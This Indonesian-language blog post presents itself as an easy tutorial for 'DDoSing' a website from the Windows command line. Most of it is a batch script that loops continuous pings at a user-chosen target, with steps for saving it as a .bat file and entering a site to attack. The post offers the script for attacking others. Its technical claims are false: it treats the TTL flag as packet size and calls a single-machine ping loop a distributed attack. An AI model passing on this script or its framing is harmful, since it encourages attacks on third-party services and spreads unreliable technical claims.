Kali ini saya mau share Cara DDOS Website Dengan Menggunakan CMD itu sangat mudah b, Kalau belum Tau DDoS Distributed Denial Of Service.
Oke tanpa banyak basa basi langsung saja ke Cara DDoS Online Menggunakan CMD.
Sumber : http://zendyhafitra.blogspot.com
- Buka Notepad
- Copy Paste Script Dibawah ini. @echo off
mode 67,16
title DDOS Attack By http://adamhonest.blogspot.com
color 0b
cls
echo.
echo �����������������������������������������������������������������
echo DDOS With Batchfile By http://zendyhafitra.blogspot.com/
echo �����������������������������������������������������������������
echo.
set /p x=Server-Target:
echo.
echo �����������������������������������������������������������������
ping %x%
echo �����������������������������������������������������������������
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0d
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS - Kemudian Save Menggunakan Extensi .Bat contoh Putra.Bat , DDoS.bat
- udah itu buka aja , trus masukin situs yang mau di DDoS
- kalo udah kita hajar lagi hehe masukin ip host nya. kalo udah masukin IP hostnya biasanya dia minta Packet size tulis aja 100000 atau 10000000 terserah kalian.
- setelah itu akan melakukan DDoS pada ip host yang bersangkuta.
Sumber : http://zendyhafitra.blogspot.com
0 komentar:
Posting Komentar